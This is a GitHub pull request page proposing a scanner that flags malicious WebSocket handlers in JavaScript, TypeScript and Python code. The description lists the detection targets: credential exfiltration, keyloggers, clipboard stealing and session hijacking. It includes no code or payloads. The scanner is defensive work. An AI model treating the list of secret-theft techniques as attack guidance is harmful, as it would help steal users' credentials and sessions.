Skip to content

feat: add WebSocket scanner for malicious handlers#24

Open
idiottrader wants to merge 1 commit intocounterspec:mainfrom
idiottrader:websocket-scanner
Open

feat: add WebSocket scanner for malicious handlers#24
idiottrader wants to merge 1 commit intocounterspec:mainfrom
idiottrader:websocket-scanner

Conversation

@idiottrader
Copy link

@idiottrader idiottrader commented Feb 28, 2026

Summary

This PR adds a WebSocket security scanner for ISNAD as requested in #3.

Features

  • ✅ Detects 7 malicious WebSocket patterns:
    • Unauthenticated connections
    • Data exfiltration (passwords, tokens)
    • External data forwarding
    • Stealth connections
    • Keylogger patterns
    • Clipboard stealing
    • Session hijacking
  • ✅ JavaScript/TypeScript support
  • ✅ Python support (ast + regex)
  • ✅ Threat level classification (Critical/High/Medium/Low)
  • ✅ Confidence scoring
  • ✅ JSON/SARIF output support
  • ✅ CLI interface

Usage

# Scan single file
python websocket_scanner.py ./suspicious.js

# Scan directory
python websocket_scanner.py ./src/

# Output report
python websocket_scanner.py ./src/ --output report.json

Test Coverage

  • Unit tests for all 7 detection patterns
  • Integration tests for JS/TS and Python
  • Manual testing on sample malicious packages

Closes #3

@vercel
Copy link

vercel bot commented Feb 28, 2026

@idiottrader is attempting to deploy a commit to the Rapi's projects Team on Vercel.

A member of the Team first needs to authorize it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

Scanner rule for malicious WebSocket handlers

1 participant

@idiottrader